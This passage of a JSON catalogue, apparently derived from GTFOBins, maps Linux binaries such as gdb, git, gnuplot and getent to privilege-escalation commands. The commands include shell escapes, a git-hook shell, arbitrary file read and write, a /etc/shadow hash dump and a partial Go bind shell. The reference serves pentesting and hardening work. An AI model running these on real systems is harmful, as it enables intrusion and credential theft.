Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:shell:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:0:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"gem open debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:0:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"gem open debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:1:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"gem build /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:1:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"gem build /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:2:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"gem install --file /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:2:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"gem install --file /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:shell:0:sudo","toolId":"gtfo:gem","toolName":"gem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gem open -e '/bin/sh -s' debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:shell:0:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gem open -e '/bin/sh -s' debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genie:shell:0:sudo","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genie/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genie:shell:0:suid","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genie/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genie:shell:0:unprivileged","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genie/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:0:sudo","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:0:suid","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:0:unprivileged","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:1:sudo","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:1:suid","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:1:unprivileged","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:getent:privilege-escalation:0:sudo","toolId":"gtfo:getent","toolName":"getent","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"getent shadow","description":"This allows to dump password hashes from the `/etc/shadow` file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/getent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:getent:privilege-escalation:0:suid","toolId":"gtfo:getent","toolName":"getent","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"getent shadow","description":"This allows to dump password hashes from the `/etc/shadow` file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/getent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ghc:shell:0:sudo","toolId":"gtfo:ghc","toolName":"ghc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ghc -e 'System.Process.callCommand \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ghc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ghc:shell:0:unprivileged","toolId":"gtfo:ghc","toolName":"ghc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ghc -e 'System.Process.callCommand \"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ghc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ghci:shell:0:sudo","toolId":"gtfo:ghci","toolName":"ghci","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ghci\nSystem.Process.callCommand \"/bin/sh\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ghci/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ghci:shell:0:unprivileged","toolId":"gtfo:ghci","toolName":"ghci","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ghci\nSystem.Process.callCommand \"/bin/sh\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ghci/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gimp:inherit:0:sudo","toolId":"gtfo:gimp","toolName":"gimp","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gimp -idf --batch-interpreter=python-fu-eval -b '...'","description":"This allows to run Python code (`...`). It hangs afterwards and can be terminated by pressing `Ctrl-C`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gimp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gimp:inherit:0:unprivileged","toolId":"gtfo:gimp","toolName":"gimp","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"gimp -idf --batch-interpreter=python-fu-eval -b '...'","description":"This allows to run Python code (`...`). It hangs afterwards and can be terminated by pressing `Ctrl-C`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gimp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ginsh:shell:0:sudo","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ginsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ginsh:shell:0:suid","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ginsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ginsh:shell:0:unprivileged","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ginsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-read:0:sudo","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-read:0:suid","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-read:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-write:0:sudo","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-write:0:suid","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-write:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:inherit:0:sudo","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"git help config","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:inherit:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"git help config","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:inherit:1:sudo","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"git branch --help config\n!/bin/sh","description":"The help system can also be reached from any `git` command, e.g., `git branch`.","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:inherit:1:unprivileged","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"git branch --help config\n!/bin/sh","description":"The help system can also be reached from any `git` command, e.g., `git branch`.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:0:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"PAGER='/bin/sh -c \"exec sh 0<&1\"' git -p help","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"PAGER='/bin/sh -c \"exec sh 0<&1\"' git -p help","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:1:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"git init .\necho 'exec /bin/sh 0<&2 1>&2' >.git/hooks/pre-commit\nchmod +x .git/hooks/pre-commit\ngit -C . commit --allow-empty -m x","description":"Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used, and moving into the directory works too.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:1:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"git init .\necho 'exec /bin/sh 0<&2 1>&2' >.git/hooks/pre-commit\nchmod +x .git/hooks/pre-commit\ngit -C . commit --allow-empty -m x","description":"Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used, and moving into the directory works too.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:2:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:2:suid","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:2:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gnuplot:shell:0:sudo","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gnuplot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gnuplot:shell:0:suid","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gnuplot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gnuplot:shell:0:unprivileged","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gnuplot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:go:bind-shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], []byte{0,0,0,0})\\n\\tsyscall.Bind(fd, addr)\\n\\tsyscall.Listen(fd, 1)\\n\\tnfd, _, _ := syscall.Accept(fd)\\n\\tsyscall.Dup2(nfd, 0)\\n\\tsyscall.Dup2(nfd, 